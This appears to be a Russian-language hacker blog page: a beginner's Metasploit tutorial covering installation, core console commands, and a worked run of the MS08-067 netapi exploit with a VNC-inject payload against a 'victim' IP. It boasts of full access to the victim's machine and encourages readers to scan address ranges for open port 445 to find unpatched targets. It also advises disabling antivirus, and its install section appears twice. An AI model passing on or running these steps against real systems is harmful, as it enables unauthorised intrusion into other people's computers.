В этой статье мы покажем на простом примере на что способен MSF. Для примера будем использовать MS08-067 netapi exploit. Также освоим основные команды.
Запускаем консоль :
Команда show exploits показывает все доступные эксплоиты. Как видите выбирать есть из чего. Имеются эксплоиты под разные платформы: Windows, Linux, IIS, Apach и т.д :
Сейчас мы опишем процедуру выбора определенного эксплоита и его запуска. Команда use [название эксплоита] активирует его рабочую среду. Мы будем использовать как пример MS08-067 netapi exploit.
Набираем : use windows/smb/ms08_067_netapi
Чтобы вернуться назад - используем команду back.
Чтобы узнать больше инфы об эксплоите - info.
Ну так значит, вот, мы и в рабочей среде эксплоита. Набираем show options чтьб увидеть какие условия необходимо выполнить:
Этот эксплоит твебует введения трех параметров : RHOST - IP адресс цели необходимо указать (остальные уже заполнены по умолчанию).
Набираем set RHOST [IP адресс жертвы] :
Команда show payloads выводит все начинки, которые можно использовать с данным эксплоитом.
Мы будем использовать начинку windos/vncinject/bind_tcp
Набираем set PAYLOAD windows/vcninject/bind_tcp
Если вы подозреваете, что на машине жертвы может стоять фаервол, тогда используем windows/vcninject/reverse_tcp.
Ну вот, все готово, теперь командуем exploit или run. Эта команда запускает выбранный и настроенный эксплоит против жертвы :
Ну вот и все - мы в компе у жертвы и можем делать все, что захотим... :)
Video [TuT] на инглише.
Уязвимость правда довольно старенькая, но тачки с ней еще встречаются, так что вперед сканим диапазоны на открытый 445 й порт. Удачи :)
$vz00r
samedi 30 janvier 2010
Начало
Установка.
Для начала качаем Metasploit с оффициального сайта.
На момент написания статьи это Metasploit v3.3.3
Процедура установки достаточно проста - жмем постоянно NEXT. Во время установки будет предложено установить NMAP и WinPcap - соглашаемся и устанавливаем и их до кучи (без них многие функции будут недоступны). Под конец получаем на рабочем столе 2 иконки: Metasploit console и Metasploit update.
ВНИМАНИЕ ! : до установки и во время использования необходимо отключить антивирус, а то запарит матюкаться.
Загружаем обновления.
Кликаем на Metasploit update и тупо ждем - Metasploit все сделает сам: и заапдейтится и сам закроется по окончании.
Знакомство : MSF Console.
Кликаем на Metasploit Console и получаем вот это :
Это основное окно MSF с которым мы и будем работать. Пока ни хрена не понятно - но это временно :)
Команды.
Интуитивно или наобум набираем help и жмем ENTER :
Перед нами список команд. Опишем наиболее часто используемые
? – Показывает существующие команды.
back - Назад к консоли.
connect - Соединение с хостом.
exit - Покинуть консоль.
help - Существующие команды.
info – Информация о модуле.
kill – Останавливает текущую работу.
load – Загружает плагин.
quit – Покинуть консоль.
search – Поиск по ключевому слову.
show – Показывает модули.
unload – Выгружает плагин.
use – Выбираем модуль к работе.
run или exploit - запускает модуль.
set - выставляем параметры.
Ну вот и все для начала, а как всем этим пользоваться будет описано в следующей статье...
Для начала качаем Metasploit с оффициального сайта.
На момент написания статьи это Metasploit v3.3.3
Процедура установки достаточно проста - жмем постоянно NEXT. Во время установки будет предложено установить NMAP и WinPcap - соглашаемся и устанавливаем и их до кучи (без них многие функции будут недоступны). Под конец получаем на рабочем столе 2 иконки: Metasploit console и Metasploit update.
ВНИМАНИЕ ! : до установки и во время использования необходимо отключить антивирус, а то запарит матюкаться.
Загружаем обновления.
Кликаем на Metasploit update и тупо ждем - Metasploit все сделает сам: и заапдейтится и сам закроется по окончании.
Знакомство : MSF Console.
Кликаем на Metasploit Console и получаем вот это :
Это основное окно MSF с которым мы и будем работать. Пока ни хрена не понятно - но это временно :)
Команды.
Интуитивно или наобум набираем help и жмем ENTER :
Перед нами список команд. Опишем наиболее часто используемые
? – Показывает существующие команды.
back - Назад к консоли.
connect - Соединение с хостом.
exit - Покинуть консоль.
help - Существующие команды.
info – Информация о модуле.
kill – Останавливает текущую работу.
load – Загружает плагин.
quit – Покинуть консоль.
search – Поиск по ключевому слову.
show – Показывает модули.
unload – Выгружает плагин.
use – Выбираем модуль к работе.
run или exploit - запускает модуль.
set - выставляем параметры.
Ну вот и все для начала, а как всем этим пользоваться будет описано в следующей статье...
Inscription à :
Articles (Atom)